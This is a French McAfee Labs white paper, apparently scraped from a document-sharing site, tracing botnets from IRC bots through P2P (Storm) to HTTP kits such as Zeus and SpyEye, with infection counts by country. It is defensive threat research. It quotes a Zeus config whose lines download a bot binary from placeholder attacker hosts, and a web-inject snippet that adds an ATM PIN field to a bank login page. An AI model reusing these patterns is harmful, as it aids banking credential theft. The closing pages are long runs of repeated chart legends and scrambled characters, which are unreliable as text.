Les réseaux de robots à l

Les réseaux de robots à l'aube d'une nouvelle ère

Documents
14 pages
Lire
Le téléchargement nécessite un accès à la bibliothèque YouScribe
Tout savoir sur nos offres

Description

Livre blanc
Les réseaux de robots à l'aube
d'une nouvelle ère
Zheng Bu, Pedro Bueno, Rahul Kashyap
et Adam Wosotowsky
™McAfee Labs Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
Sommaire
Le développement 3
Evolution 4
Robots IRC 4
Robots localisés 4
Robots peer-to-peer 4
Robots HTTP 5
Spy Eye 7
Prévalence mondiale 8
La distribution des réseaux de robots : principales menaces par pays 9
Le rôle des gouvernements 10
Personnes et entités à risque 11
Perspectives d'avenir 11
Une nouvelle génération de zombies de réseau social 12
Des méthodes toujours plus furtives 13
Une nouvelle arme : McAfee Global Threat Intelligence 14
Références 14
™A propos de McAfee Labs 14
A propos de McAfee 14 Livre blanc Les réseaux de robots à l'aube d'une nouvelle ère
L'histoire des réseaux de robots, ou botnets, a connu quelques rebondissements. Par essence, un robot
(bot) n'est jamais qu'une série de scripts ou de commandes, ou un programme conçu pour établir une
connexion (généralement à un serveur) et exécuter une ou plusieurs commandes. Fondamentalement,
il sert à exécuter de multiples fonctions ; il n'est pas nécessairement malveillant ou nuisible par nature.
Son usage a évolué au fil du temps. Au départ simples « observateurs » de canaux ou de jeux (comme les
robots Bartender de Wisner ou GM de Lindahl), les robots fournissent aujourd'hui des services spécialisés,
notamment dans le cadre de la gestion des bases de données ou de la maintenance des listes d'accès.
Le ...

Sujets

Informations

Publié par
Nombre de visites sur la page 76
Langue Français
Signaler un problème
Livre blanc
Les réseaux de robots à l'aube d'une nouvelle ère
Zheng Bu, Pedro Bueno, Rahul Kashyap
et Adam Wosotowsky
McAfee Labs
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
Sommaire Le développement Evolution Robots IRC Robots localisés Robots peer-to-peer Robots HTTP Spy Eye Prévalence mondiale La distribution des réseaux de robots : principales menaces par pays Le rôle des gouvernements Personnes et entités à risque Perspectives d'avenir Une nouvelle génération de zombies de réseau social Des méthodes toujours plus furtives Une nouvelle arme : McAfee Global Threat Intelligence Références A propos de McAfee Labs A propos de McAfee
3 4 4 4 4 5 7 8 9 10 11 11 12 13 14 14 14 14
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
L'histoire des réseaux de robots, ou botnets , a connu quelques rebondissements. Par essence, un robot ( bot ) n'est jamais qu'une série de scripts ou de commandes, ou un programme conçu pour établir une connexion (généralement à un serveur) et exécuter une ou plusieurs commandes. Fondamentalement, il sert à exécuter de multiples fonctions ; il n'est pas nécessairement malveillant ou nuisible par nature. Son usage a évolué au fil du temps. Au départ simples « observateurs » de canaux ou de jeux (comme les robots Bartender de Wisner ou GM de Lindahl), les robots fournissent aujourd'hui des services spécialisés, notamment dans le cadre de la gestion des bases de données ou de la maintenance des listes d'accès. Le présent rapport se penche, quant à lui, sur un type d'utilisation très différent : le contrôle de robots (également appelé « drones » ou « zombies ») par des cybercriminels pour faciliter et développer leurs activités délictueuses. Ces activités répréhensibles affectent les entreprises de diverses façons : vol de secrets commerciaux, incorporation de logiciels malveillants dans des fichiers de code source, perturbation de l'accès ou des services, compromission de l'intégrité des donnés et vol des informations d'identité du personnel. Elles peuvent avoir des conséquences catastrophiques sur une entreprise et entraîner, par exemple, un baisse des revenus, des infractions aux réglementations, la perte de confiance des clients, une réputation entachée, voire la faillite de l'entreprise. En ce qui concerne les administrations publiques et les organismes de secteur public, l'impact revêt une portée encore plus grande. Ce livre blanc étudie l'évolution des robots criminels, le secteur qui soutient leur création et leur distribution ainsi que leurs divers modes d'utilisation par les réseaux cybercriminels actuels. Il envisage également l'évolution probable des robots dans un avenir proche. Le développement Les réseaux de robots affichent, malheureusement, une belle courbe de croissance. Les robots et les réseaux de robots du début de ce siècle ont été créés par des programmeurs dotés de connaissances pointues des réseaux et des protocoles, notamment le protocole IRC (Internet Relay Chat). L'exploitation d'IRC a marqué le début d'une tendance au contrôle centralisé. Le robot SDBot, l'un des premiers et des plus célèbres, a été codé en langage C++. (Son utilisation s'est rapidement répandue car son auteur a publié le code source, ce qui constitue une pratique assez inhabituelle.) Les versions ultérieures de SDBot, également appelé SpyBot, ont commencé à exploiter les vulnérabilités des appels de procédure à distance de Microsoft. Pour créer de tels robots, les programmeurs devaient disposer de compétences en codage d'exploits. A cette époque, la prolifération des robots et des botnets a été favorisée par les nombreuses vulnérabilités présentes sur les plates-formes Windows les plus populaires, que les programmeurs n'ont pas manqué d'exploiter. Les robots apparus par la suite intégraient, en plus, des fonctionnalités conçues notamment pour lancer des attaques par déni de service, analyser les ports et enregistrer les frappes au clavier. Pour concevoir ces logiciels malveillants, leurs auteurs devaient maîtriser un langage assembleur et bénéficier d'excellentes connaissances en matière de réseaux. Le robot RBot, apparu en 2003, a été le premier à utiliser des programmes et modèles de compression et de chiffrement tels que UPX, Morphine et ASPack. L'emploi de ces technologies a contribué à l'émergence d'une nouvelle génération de programmeurs hautement qualifiés qui comprenaient les modèles de chiffrement et la cryptographie et savaient intégrer les techniques de contournement aux fichiers binaires qu'ils créaient. A ce stade, plus aucun retour en arrière n'était possible. Le succès de RBot a ouvert la voie à l'emploi généralisé des techniques de chiffrement et de dissimulation dans les robots et les réseaux de robots. Pour faciliter le contrôle de ces réseaux et les communications, l'une des grandes innovations a été l'utilisation des réseaux peer-to-peer, notamment par Sinit (2003) et Phatbot (2004). L'adoption de la technologie peer-to-peer a révolutionné la communication des réseaux de robots. Elle a d'ailleurs favorisé l'apparition, en 2007, d'un des réseaux de robots peer-to-peer les plus évolués qui soient : Storm Worm/Nuwar. Ce réseau, qui reposait sur une architecture peer-to-peer décentralisée, a été pendant un certain temps exceptionnellement difficile à neutraliser. Les nombreuses solutions de sécurité qui ont été développées pour combattre cette menace ont conduit à une sophistication croissante de la technologie des robots. Celle-ci a favorisé à son tour le développement de nouvelles technologies de sécurité, donnant lieu à une relation très complexe entre auteurs de logiciels malveillants et éditeurs de solutions de sécurité, où les offensives des uns succèdent aux contre-offensives des autres. Il ne fait aucun doute que les réseaux de robots ont gagné en complexité. Ils exigent de leurs auteurs des connaissances approfondies des technologies réseau, des systèmes et de la cryptographie. A la lumière de leur envergure et de leur degré de sophistication, il est clair que ces réseaux de robots ne sont pas le fait d'un petit groupe d'individus mais d'un véritable milieu cybercriminel, motivé par les gains financiers générés par ces activités. Leur objectif est clair : la compromission des entreprises et le vol de données possédant une valeur monétaire.
3
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
Evolution Robots IRC Les premiers robots n'étaient pas toujours malveillants. Bien que cela ne soit plus vrai à présent, surtout depuis leur explosion aux environs de 2004, les robots de la première génération utilisaient généralement IRC comme protocole de contrôle. IRC a été le premier protocole utilisé pour établir des connexions aux salles de conversation ( chat rooms ). Très couramment utilisé il y a dix à quinze ans, il permettait aux utilisateurs d'échanger des messages. Toutefois, avec l'avènement des protocoles de messagerie instantanée, tels que ICQ, AIM et MSN Messenger, IRC a quelque peu perdu les faveurs du public, même s'il est toujours utilisé par de nombreux professionnels de la sécurité et des réseaux traditionalistes. Les premiers robots ont été créés pour se connecter à ces salles de conversations (aussi appelées channels , « canaux ») et faire en sorte que le canal de communication reste ouvert, mais aussi pour reconnaître les opérateurs du canal et leur permettre de le contrôler. Certains programmeurs malveillants se sont mis à créer des robots capables de balayer le réseau et d'exploiter les ordinateurs vulnérables. Dès qu'un ordinateur était compromis, le robot se connectait à une salle de conversation (canal) spécifique et recevait ses instructions du maître du réseau de robots, par exemple le lancement d'une attaque par déni de service contre un site web. Cette tactique est toujours utilisée à l'heure actuelle, comme l'illustre la récente attaque W32/Vulcanbot lancée contre des sites web de militants pour les droits de l'homme. D'autres fonctions IRC courantes consistent par exemple à effectuer des captures d'écran de l'hôte, à télécharger ou à mettre à niveau un robot, etc. Certains robots peuvent exécuter plus de cent commandes. L'année 2004 a été caractérisée par une explosion du nombre de robots, due à la commercialisation de nombreuses applications à interface utilisateur graphique qui permettaient aux pirates informatiques de créer des robots par un simple pointer-cliquer. La simplification du processus de création a représenté une grande avancée pour les cybercriminels et les auteurs de programmes malveillants : il n'était plus nécessaire de posséder des compétences en programmation ni des connaissances approfondies des protocoles réseau et des systèmes d'exploitation pour pouvoir créer un large éventail de robots. Quelques clics suffisaient. Robots localisés Bien que les robots s'exécutent en grande majorité sur des versions de Windows, certaines versions localisées sont également apparues. A l'aide du langage de script Perl, des pirates informatiques ont créé des versions de robots qui s'exécutent aussi sur plusieurs versions des systèmes Unix et Linux. C'est le groupe brésilien Atrix-Team, au départ constitué de pirates en herbe, qui en est à l'origine. En raison du format en code source ouvert de ces robots, bon nombre de ces versions sont encore employées aujourd'hui. Robots peer-to-peer Les réseaux de robots IRC d'ancienne génération sont toujours populaires, mais ils souffrent d'un point de défaillance unique : le serveur IRC. Une fois ce dernier arrêté, le pirate perd le contrôle de son armée de robots. L'année 2007 a vu apparaître un nouveau type de réseau de robots basé sur des protocoles P2P. Ce sont les mêmes protocoles que ceux utilisés par de nombreux programmes pour télécharger de la musique, par exemple. L'un de ces réseaux utilisait une implémentation chiffrée basée sur le protocole eDonkey. Ce logiciel malveillant jouit d'une grande notoriété : au départ connu sous le nom de W32/Nuwar, il est devenu célèbre sous le nom de ver Storm. Storm incorporait près de cent « peers » (les unités d'un réseau peer-to-peer) codés sous la forme de valeurs de hachage, que le programme malveillant déchiffrait et utilisait pour vérifier les nouveaux fichiers à télécharger. Toutes les transactions étant chiffrées, seul le logiciel malveillant pouvait déchiffrer la réponse et exécuter l'opération demandée. Les réponses redirigeaient généralement vers des URL qui provoquaient le téléchargement d'autres fichiers binaires. Storm a été à l'origine de la plupart du spam apparu au cours des années 2007 et 2008 avant d'être démantelé. L'avantage de l'approche peer-to-peer réside dans sa structure de contrôle distribuée et résiliente, qui rend l'arrêt d'un réseau de robots IRC plus ardu. Toutefois, elle est plus difficile à gérer et à propager en raison de sa complexité. Encore très récemment (à la fin du mois d'avril 2010), nous avons découvert un autre logiciel malveillant qui utilisait en partie le même code que le ver Storm, notamment le code responsable d'attaques de spam et par déni de service.
4
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
Robots HTTP Il y a deux ou trois ans, nous avons observé un changement dans la manière dont les réseaux de robots sont contrôlés, passant des canaux IRC à des sites web utilisant le protocole HTTP. Ce passage à un protocole courant est une manœuvre très intelligente de la part des cybercriminels et des auteurs de logiciels malveillants. Cette transition vers HTTP a commencé grâce aux progrès réalisés en matière de « kits d'exploit ». Ces kits, développés principalement par des cybercriminels russes, incluent Mpack, ICEPack et Fiesta. Ils sont capables d'installer des logiciels sur des ordinateurs distants et de les contrôler à partir d'un site web distant. Le cybercriminel envoie du spam ou un message instantané contenant divers liens à des victimes potentielles. Ces liens redirigent les utilisateurs vers un site web sur lequel le kit d'exploit est installé. A ce moment, le kit détermine quel exploit utiliser en fonction des caractéristiques de l'ordinateur cible : le pays, le système d'exploitation, le navigateur et les multiples versions d'applications clientes. Toutes ces opérations se déroulent de façon dynamique, à l'insu de l'utilisateur. Si l'exploitation réussit, il est possible d'installer ultérieurement d'autres logiciels malveillants afin de prendre le contrôle de l'ordinateur infecté. De tous les réseaux de robots HTTP actuels, le réseau Zeus (également appelé Zbot) est un cas à part, spécialisé dans le vol d'informations d'identification bancaires. Zeus est composé d'un élément client et d'un élément serveur. L'élément serveur possède un outil de type générateur (« builder ») qui permet au maître du réseau de robots de créer sur le client une variante du logiciel malveillant PWS-ZBot, qui infecte ensuite un ordinateur et l'intègre au réseau de robots en le connectant à un site web distant qui héberge le serveur Zeus. Zeus est caractéristique d'une nouvelle tendance qui permet à pratiquement n'importe qui de créer facilement une version personnalisée du logiciel malveillant. Le kit d'outils Zeus est assez cher à l'achat, mais son auteur tout prévu pour que l'outil soit simple à utiliser et donc facile à vendre à un grand nombre, ce qui augmente d'autant ses revenus. L'exemple suivant illustre l'outil Zeus Builder version 1.2.x :
Le volet de gauche affiche deux options seulement : Information et Builder. La sélection de l'option Information permet de savoir si l'ordinateur est infecté par Zeus. Quant à l'option Builder, elle offre à l'individu qui contrôle le kit la possibilité de construire un nouveau robot. Le kit utilise deux fichiers d'entrée : Config et WebInjects. Bien que l'outil Zeus Builder possède un bouton destiné à modifier le fichier Config, il s'agit simplement d'un raccourci. Le fichier est modifié à l'aide du Bloc-notes. Le fichier Config contient les paramètres que le robot doit exécuter.
5
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
Exemples de fichier Config : url_config "http://www.[adresse-IP-malfaiteurs].cn/cp/config.bin" url_compip "http://www.[adresse-IP-malfaiteurs].com/" 2048 encryption_key "12345654321" ;blacklist_languages 1049 end
entry "DynamicConfig" url_loader "http://www.[autre-adresse-IP-malfaiteurs].cn/cp/bot.exe" Cet extrait du fichier Config indique au robot où télécharger le fichier de configuration et le robot lui-même. Ces étapes permettent aux maîtres des réseaux de robots de mettre à jour les robots et les configurations avec de nouvelles fonctionnalités et cibles à tout moment. Elles leur permettent également de distribuer le fichier de configuration et le fichier binaire du robot vers différents serveurs et de rendre ainsi le réseau résilient grâce à une architecture distribuée. Le second fichier nécessaire à la création du robot est WebInject. Ce fichier spécifie les cibles, ou victimes, à qui l'auteur du logiciel malveillant ou propriétaire du kit d'outils veut dérober des informations. Zeus est en mesure de collecter les informations de la page web d'origine mais aussi d'insérer des champs supplémentaires. Il peut donc s'emparer d'informations supplémentaires si son propriétaire le décide. Exemple de fichier WebInject : _ https://www.[g nde-banque-victime].com/* G set url ra data before _ <span class="mozcloak"><input type="password"*/></span> _ data end data_inject <br><strong><label for="atmpin">ATM PIN</label>:</strong>&nbsp;<br /> <span class="mozcloak"><input type="password" accesskey="A" id="atmpin" name="USpass" size="13" maxlength="14" style="width:147px" tabindex="2" /></span> _ data end _ data after data end _ Ce code permet de recueillir des informations sur l'URL cible, qui dans cet exemple est une banque. Outre le nom d'utilisateur et le mot de passe, Zeus injecte un autre champ pour recueillir le code de la carte bancaire.
6
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
Comme de nombreux autres logiciels malveillants populaires, Zeus a donné lieu à plusieurs versions « piratées » de son outil Builder. Comble de l'ironie, certains d'entre eux incorporaient même leur propre porte dérobée ( backdoor ). La capture d'écran suivante illustre l'une de ces versions piratées :
Cette version, appelée MultiBuilder, a permis de créer deux variantes basées sur Zeus version 1.3. Récemment, les auteurs de Zeus sont passés de la version 1.3 à la version 2.0, laquelle contient désormais un modèle de licence strict. Etonnamment, Zeus est en fait lié à l'ordinateur de l'acheteur à l'aide d'une licence logiciel commerciale. La technique de création et le canal de distribution de ce logiciel malveillant témoignent d'un grand sens des affaires. Spy Eye Spy Eye est un autre exemple de robot HTTP complexe. Il présente plusieurs similitudes avec Zeus, principalement en cela qu'il s'agit aussi d'un outil de collecte d'informations de formulaire et qu'il repose sur une architecture de contrôle impressionnante. A l'instar de Zeus, Spy Eye possède son propre générateur graphique :
7
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
Spy Eye a ceci d'intéressant qu'il peut détruire (supprimer) Zeus de l'ordinateur qu'il infecte, illustrant ainsi les luttes intestines au sein de la communauté des auteurs de logiciels malveillants. Cette rivalité n'est pas nouvelle. Pour éviter d'être analysés par leurs cibles, Zeus et Spy Eye offrent tous deux la possibilité d'utiliser une clé de chiffrement pendant le processus de génération du robot. Dans les premières versions de Zeus, cette clé était intégrée au code, ce qui permettait aux professionnels de la sécurité d'analyser et d'identifier plus rapidement les cibles du logiciel malveillant. Avec cette nouvelle fonctionnalité, les cybercriminels sont passés à la vitesse supérieure. Prévalence mondiale Distribution globale des réseaux de robots par pays
Inde Brésil Russie Allemagne Etats-Unis Grande-Bretagne Colombie Indonésie Italie Espagne Argentine Pologne Pakistan Portugal Vietnam Corée du Sud Grèce Chine Belarus Australie Autres
Figure 1 — McAfee Labs a observé plus de détections de réseaux de robots (près d'un million et demi) en Inde que dans n'importe quel autre pays. Le Brésil, la Russie et l'Allemagne dépassent également le million d'infections.
8
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
La distribution des réseaux de robots : principales menaces par pays Allemagne Ar ntine Asprox ge Asprox Bagle-CB Bagle-CB Bobax Bobax Cimbot Cimbot Cutwail Cutwail Cutwail2 Cutwail2 DarkMailer DarkMailer Dlena Dlena Donbot Donbot Festi Festi Gheg Gheg Grum Grum Grum2 Grum2 HelloGirl HelloGirl Lethic Lethic Maazben Maazben Mega-D Mega-D Netsky Netsky Autres Autres RK1 RK1 RK2 RK2 Reposin Reposin Rustock Rustock Storm Storm TwitGenPhish TwitGenPhish Xarvester Xarvester
Brésil
Espagne
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Chine
Etats-Unis
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Australie
Colombie
Grande-Bretagne
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Belarus
Corée du Sud
Grèce
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
9
sArpxoaBlg-eBCoBbaxCimbotCutwailrotSiwTmneGtsihParhXstveergerGithGmuH2murGGirlelloicMaLeth2liawtuCliaMkraDaDenDlerestFboonlenaDonbkMailerDehGgurGmtoeFtsGimbCiCuotBB-CaxobliawraD2iawttuClRK1RtreskyAuNetsotkcRnsuopis2KeRetlLiroGllHem2ruD-ageMnebzaaMcihhsihvraXtiwTPneGkSocrmtoinosstRu1KKRR2peAytuerRsa-DNetskazbenMegresteum2HumGrGirlelloFtsenoobgerGithGsketDNa-sRreutyAaMcihteLgeMnebzaockStormTwitGenP1KKRR2pesoniuRtsspAxBroleaghsihvraXetserabCxmioblg-eBCoBAsproxBalDreDanekraDliaMtwCul2aiuttCilwarbouedséaenurtsoraincontotssirpaL.elagélld'eôltroncdeefiaeruels'dnesationineutiliseddniocsertnceusibptidivsusmonsduntiedeeeitnrosétégporitcesdetsenoysnisednoitutitellectuelleetdeocnedtnaiilétueqeslrodsitpedrporétéitnineerttemtnemelleentutévreecuutsartnirfe'lvenidaunsiouaretntpurdreiseprovoqurobots,séaeuediteudriuqsruraptnofslergetenadioreptuuqimoamednsystleceème,iosédttnamrelene'utrségat :ieer» àdcédirednnouveau« maîtrirésedissuqcaedboroésruxeasnoffstàdseoucontrensivesseduocilbuprurentonststaEuorrenpetseetxauseutpaaiensparerail,erstiacnodïanedfcroirequedesganeecsudsceetsleederisiluttua'dà.snsertypeCenterd'ioinevtnnat'ntéesdetrlespostsniuqeiclesiaapcalitIl.steatilseriiavaimlspa,levéespritéséosicelsnetfoessmnigaorseltesreilucitrpmraredu'néressdevouloirs'eér suaesnixrtldauroetsboCe.itéteneliecvifense-of.Univeselsetuonosiarsioatnoutalena
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Indonésie
Portugal
Vietnam
Pakistan
Italie
Russie
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Asprox Bagle-CB Bobax Cimbot Cutwail Cutwail2 DarkMailer Dlena Donbot Festi Gheg Grum Grum2 HelloGirl Lethic Maazben Mega-D Netsky Autres RK1 RK2 Reposin Rustock Storm TwitGenPhish Xarvester
Pologne
Livre blanc  Les réseaux de robots à l'aube d'une nouvelle ère
Inde
idffsuoiadsnlaformationdesinenreu,tdtntnI'picaltaounltiendmuiauohlletemefordentépenstnedicnisedàretunaeinigord'nterruptiondeceux'dniofmrtaporéesnsTo.eutrgédtadanoiiuoàlsetordiaconodanitruseelnuànsévergladliatneeitrapecosunmmitacdeé'l,cfetropetnaplusimplusenlpcaeednetnueupccoesgilonochetselùoednomsun.Danisésutiltééjéàtndaeiàégaérfriecateurleapcitacnedserssuocrsee.L'organisatio'dnoitssircenunioutolgealoudnaatelrsésalionicatcapiestduoesserpedsnt'idesipquéesruegn'dtnoireevndendépequincetêtaerepsnevurpasdeecffstéitnosicnietrrpusorganebléesdeotobrdearmausrionéhceriov,d'emêmeendrnprcnoeeletertlôd'tteInetrnIl.tsesoplbis'deacheteroudeloeuredséresuaxcombdeâtrethéevuanuornuevinmlaequselttsnemenévéseD.staruninc aggravetneoceroisnpueiebdenurpoitraretntennediI.tuelkaoœnvusamopeEurnIreteedseleeéroCxuvanasretrensleelGloefdueMixaréenoiredansàstalbmobneee,queslttataenvuogenretnemmAsuresquelaeenmcaeedcbyreugreresepréciseetseleuqegammodnttepos'udlsieleelentrregeuenteaugmtoutnt,roceirorpàteesérxuaeuqselsserontderoboteedpéruenamrlnsdanioctledinevàstinocseutdepeIlsir.i'slsuqelrua'li10urigFdeorobrséaexuincipauxe2 Predniolkcottses.ayusRptspar«p lpsuleobsteroaudréselesedelôreL.ednmoua »reaiulop